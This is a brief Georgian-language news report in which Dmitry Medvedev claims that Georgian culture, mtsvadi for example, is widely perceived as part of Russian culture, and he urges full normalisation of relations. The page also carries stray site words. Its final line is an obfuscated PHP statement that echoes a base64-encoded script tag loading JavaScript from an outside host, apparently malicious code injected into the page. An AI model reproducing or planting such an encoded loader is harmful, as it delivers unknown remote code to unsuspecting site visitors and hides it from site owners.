celsiusi
ავერსი საქკაბელი

ყველაფერი, რაც კავშირშია ქართულ კულტურასთან, მთლიანობაში ჩვენი კულტურის ნაწილად აღიქმება, – ამის შესახებ რუსეთის უსაფრთხოების საბჭოს თავმჯდომარის მოადგილემ, დიმიტრი მედვედევმა განაცხადა.

როგორც მედვედევმა აღნიშნა, ქართულ კულტურას მაქსიმალურად დადებითად უყურებს.

„ეს ძველი ერია, ძველი კულტურა, ჩვენთან ძალიან ახლო, რადგან მრავალი წელია, მეზობლად ვცხოვრობთ. ჩვენს ქვეყანაში დიდი დიასპორაა და ყველაფერი, რაც კავშირშია ქართულ კულტურასთან, როგორც ცნობილია, მთლიანობაში ჩვენი კულტურის ნაწილად აღიქმება… აი, ინტერნეტში რომ შეხვიდეთ და მოძებნოთ, მაგალითად, მწვადი ან რამე მსგავსი, ბევრ ქვეყანაში ეს მიიღება არა როგორც კავკასიური სამზარეულოს ნაწილად, არამედ როგორც საერთო რუსული სამზარეულოს ნაწილად. ეს ერთ-ერთი მაგალითია. ეს ეხება მუსიკასაც, ელიტის, კულტურისა და პოლიტიკის წარმომადგენლებს. ამიტომ, რაც უფრო მალე მოხდება ურთიერთობების სრული ნორმალიზება, მით უკეთესი“, – განაცხადა მედვედევმა. 

463
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");